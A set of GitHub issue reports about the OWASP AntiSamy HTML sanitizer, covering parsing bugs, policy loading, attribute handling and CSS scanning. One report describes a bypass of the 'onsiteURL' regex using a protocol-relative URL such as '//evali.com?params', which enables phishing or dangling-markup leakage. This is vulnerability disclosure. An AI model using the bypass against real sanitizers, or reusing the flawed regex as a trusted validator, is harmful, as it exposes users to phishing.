<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&;\-_~,\?=/!]*(&colon))[\p{L}\p{N}\\\.\#@\$%\+&;\-_~,\?=/!]*"/>

usually，rich text requires the href attribute and the validation rule like this:

<attribute name="href">
			<regexp-list>
				<regexp name="onsiteURL" />
			</regexp-list>
</attribute>

so if developer trust the onsiteURL regex, they will not do any other domain validate, but the onsiteURL regex can bypass by '//' like '//evali.com?params', In this case, phishing attacks may occur. In addition, information leakage may occur due to such as dangling markup attacks.

Antisamy adds nested table tags

Input

Output after antisamy scan

After scanning, additional nested table close tags </tbody></table></td></tr> are added a line before img tag and so output becomes distorted. using antisamy.xml and not sure why nested table related tags are getting added after antisamy scan.

The 'data - *' dynamic attribute of AntiSamy.DOM is not supported.

Using AntiSamy.SAX

String input = "<div data-title=\"Pocahontas\" >Just Around the Riverbend</div>";
CleanResults results = new AntiSamy().scan(input, Policy.getInstance(), AntiSamy.SAX);
System.out.println("result: " + results.getCleanHTML());

// result: <div data-title="Pocahontas">Just Around the Riverbend</div>

Using AntiSamy.DOM

result: <div>Just Around the Riverbend</div>

Expect

result: <div data-title="Pocahontas">Just Around the Riverbend</div>

AntiSamy.DOM is the default mode, and we should support dynamic attribute.

New URL validation breaks loading from jar files

A change late last year to prevent loading of remote URLs was achieved by checking that the URL only uses the file: scheme; this breaks a very common use case, which is bundling the policy file inside a java archive of some sort (jar/war/ear) . AFAICT this is no more of a security risk than loading a file from a file: URL, and disabling this ability significantly increases the complexity of deployment in some contexts

1.5后<>不可使用

The front desk carries a parameter through the url, the value of the parameter is <>, through Policy policy = Policy.getInstance("/antisamy-slashdot-1.4.4.xml");
final CleanResults cr = antiSamy.scan(value, policy);
String str = cr.getCleanHTML();
The str obtained is escaped <>, there is no such problem before 1.5, why not after 1.5

Embed style sheets after opening `embedStyleSheets` should not be deleted all.

Set'embedStyleSheets' in the configuration：

<directive name="embedStyleSheets" value="true"/>

Input:

<!DOCTYPE html>
<html>
	<head>
		<style type='text/css'>
			@import url(https://unpkg.com/element-ui/lib/theme-chalk/index.css)
			h1 {font: 15pt "Arial"; color: blue;}
			p {font: 10pt "Arial"; color: black;}
		</style>
	</head>
	<body>
		<div>
			<h1>Title</h1>
			<p>content</p>
		</div>
	</body>
</html>

Out:

<html>
  <head>
    <style type="text/css"><![CDATA[/* */]]></style></head>
  <body>
    <div>
      <h1>Title</h1>
      <p>content</p></div></body></html>

Result： All embedded styles are deleted。

antisamy/src/main/java/org/owasp/validator/css/ExternalCssScanner.java

Lines 71 to 72 in 9733b9f

 protected void parseImportedStylesheets(LinkedList<?> stylesheets, CssHandler handler, 

 ArrayList<String> errorMessages, int sizeLimit) throws ScanException {

I found that the parseImportedStylesheets method signature cannot override the parseImportedStylesheets method of the parent class and will never be called. This seems to be a bug.

Hi, @davewichers @spassarop Is this check deprecated?

	protected void parseImportedStylesheets(LinkedList<?> stylesheets, CssHandler handler,
	ArrayList<String> errorMessages, int sizeLimit) throws ScanException {